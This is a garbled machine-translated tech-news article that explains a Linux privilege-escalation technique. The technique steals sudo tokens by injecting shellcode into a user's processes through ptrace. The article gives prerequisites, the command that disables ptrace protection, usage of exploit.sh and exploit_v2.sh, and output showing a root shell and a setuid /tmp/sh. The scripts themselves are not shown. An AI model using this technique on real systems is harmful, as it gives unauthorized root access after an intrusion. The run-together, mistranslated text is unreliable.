Shulou(Shulou.com)06/02 Report--

Xiaobian to share with you how to use sudo token in linux to achieve power, I hope you have something to gain after reading this article, let's discuss it together!

How to exploit vulnerabilities in the system?$ sudo whatever[sudo]password for user: # Press+c since you don't have the password. # This creates an invalidsudo tokens.$ sh exploit.sh.... wait 1 seconds$sudo -i # no password required :)# iduid=0(root)gid=0(root) groups=0(root) Implementation Requirements

1. Fully enable Ptrace (/proc/sys/kernel/yama/ptrace_scope == 0);

The current user must start an active process with a valid sudo token and the same uid.

Note: The default password timeout is 15 minutes. If you use sudo twice in 15 minutes, you will not be asked to enter the user's sudo password again.

working mechanism

Exploit.sh in the project directory injects Shell code into all of the current user's processes and uses their sudo tokens to verify our own sudo password. With just three lines of Shell code, anything is possible.

use the sample

Suppose you get an RCE, and there is no user password, but the target user uses sudo, then you can steal his sudo token to achieve empowerment!

How to simulate in an experimental environment?

#echo 0 > /proc/sys/kernel/yama/ptrace_scope# #Don't worry this is not persistent accross reboot

Open two terminal windows:

1. One of them executes sudo command, and then enters the correct user password (sudo ls);

2. The other executes exploit code according to the above method;

Use exploit_v2.sh to create a suid sh in/tmp/sh

If exploit_v1 doesn't work, you can try exploit_v2.sh:

$./ exploit_v2.shCurrentprocess : 2441chmod:changing permissions of 'activate_sudo_token': Operation not permittedInjectingprocess 1721 -> bashInjectingprocess 2433 -> bashcat:/proc/2446/comm: No such file or directoryInjectingprocess 2446 ->$/tmp/sh -p# iduid=1001 (test)gid=1001 (test) euid = 0 (root) egid=0(root) groups=0(root),1001(test) Finished reading this article, I believe you have a certain understanding of "how to use sudo token to achieve power promotion in linux." If you want to know more about relevant knowledge, please pay attention to the industry information channel. Thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.